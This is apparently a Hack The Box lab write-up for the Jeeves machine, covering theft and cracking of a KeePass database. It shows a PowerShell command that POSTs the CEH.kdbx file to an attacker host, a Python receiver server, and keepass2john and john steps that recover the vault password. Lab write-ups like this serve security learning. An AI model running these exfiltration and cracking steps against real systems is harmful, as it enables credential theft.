InfoSec LAB

Jeeves_KeePass

Created: 2 min read

KeePass

Checking for the home directory of the kohsuke user after conducting basic enumeration

c:\Users\kohsuke\Documents> dir
 
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 directory of c:\Users\kohsuke\Documents
 
11/03/2017  10:18 PM    <DIR>          .
11/03/2017  10:18 PM    <DIR>          ..
09/18/2017  12:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   2,330,460,160 bytes free

a keepass db file is found at c:\Users\kohsuke\Documents\CEH.kdbx I will transfer it to Kali for in-depth analysis

from http.server import BaseHTTPRequestHandler, HTTPServer
 
class myrequesthandler(basehttprequesthandler):
    def do_post(self):
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        with open('ceh.kdbx', 'wb') as f:
            f.write(data)
        self.send_response(200)
 
httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()

Due to the network limitations from NTLM configuration and the firewall profile, file transfer will be made over HTTP with a custom python HTTP server

c:\Users\kohsuke\Documents> cmd /c powershell -c "iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile C:\Users\kohsuke\Documents\CEH.kdbx"
 
┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ python3 post.py                                                                       
10.10.10.63 - - [01/dec/2023 15:55:58] "POST / HTTP/1.1" 200 -

Transfer complete

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ file CEH.kdbx                
ceh.kdbx: Keepass password database 2.x KDBX

The CEH.kdbx file is indeed a KeePass DB file, version 2.x

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ open CEH.kdbx

Opening the DB requires a valid password

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ keepass2john CEH.kdbx > CEH.kdbx.hash

Using keepass2john, I can turn the DB file into crack-able hashstring

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ john ./CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:00:21 DONE (2023-12-01 17:09) 0.04723g/s 2597p/s 2597c/s 2597C/s narda..mommy14
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

john successfully cracked the password hash The cracked password is moonshine1

Credentials

Opening the vault

Content is revealed There are a total of 8 entries, and one of which appears very interesting

Interactive Graph View

Backlinks